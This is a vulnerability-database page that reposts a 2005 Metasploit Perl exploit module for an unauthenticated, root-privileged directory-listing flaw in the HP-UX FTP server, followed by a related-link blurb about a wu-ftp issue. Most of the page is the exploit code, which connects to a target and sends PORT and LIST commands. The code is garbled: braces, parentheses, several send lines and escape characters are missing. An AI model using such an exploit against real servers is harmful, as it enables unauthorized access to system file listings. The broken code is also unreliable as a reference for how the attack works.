HP-UX FTP Server – Unauthenticated Directory Listing (Metasploit)

HP-UX FTP Server – Unauthenticated Directory Listing (Metasploit)

漏洞ID 1055417 漏洞类型
发布时间 2005-10-19 更新时间 2005-10-19
图片[1]-HP-UX FTP Server – Unauthenticated Directory Listing (Metasploit)-安全小百科CVE编号 N/A
图片[2]-HP-UX FTP Server – Unauthenticated Directory Listing (Metasploit)-安全小百科CNNVD-ID N/A
漏洞平台 HP-UX CVSS评分 N/A
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.

package Msf::Exploit::hpux_ftpd_preauth_list;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
	'Name'  => 'HP-UX FTP Server Preauthentication Directory Listing',
	'Version'  => '$Revision: 1.8 $',
	'Authors' => [ 'Optyx  <optyx [at] uberhax0r.net>'],
	'Arch'  => [ ],
	'OS'    => [ 'hpux' ],
	'Priv'  => 0,
	'UserOpts'  =>
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The FTP server port', 21],
		'RPATH' => [1, 'DATA', 'The path name to list', "/"],

	'Description'  => Pex::Text::Freeform(qq{
        This exploit abuses an unpublished vulnerability in the HP-UX FTP
        service. This flaw allows an unauthenticated remote user to obtain
        directory listings from this server with the privileges of the root
        user. This vulnerability was silently patched by HP sometime between 
		2001 and 2003.
	'Refs'  =>
		# None

	'Keys' => ['ftp'],

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_path = $self->GetVar('RPATH');

	my $s = Msf::Socket::Tcp->new
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);

	my $l = IO::Socket::INET->new
		Proto  => 'tcp',
		Listen => 5,
		Blocking => 0,
		ReuseAddr => 1,

	my $r;
	my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256);
	my $sel = IO::Select->new($l);
	my $cmd = "PORT ".join(",", split(/./,Pex::InternetIP($target_host))).$prt."rn";

	$r .= $s->Recv(-1, 5);

	$r .= $s->Recv(-1, 5);

	$s->Send("LIST $target_pathrn");
	$r .= $s->Recv(-1, 5);

	foreach (split(/n/, $r)) {
		$self->PrintLine("[*] $_");

	my @rdy = $sel->can_read(3);
	if (scalar(@rdy)) {
		my $x = $l->accept();
		$self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport);

		while (<$x>) {

# milw0rm.com [2005-10-19]

相关推荐: wu-ftp命令重写漏洞

wu-ftp命令重写漏洞 漏洞ID 1207570 漏洞类型 未知 发布时间 1997-01-11 更新时间 1997-01-11 CVE编号 CVE-1999-0081 CNNVD-ID CNNVD-199701-049 漏洞平台 N/A CVSS评分 5.…

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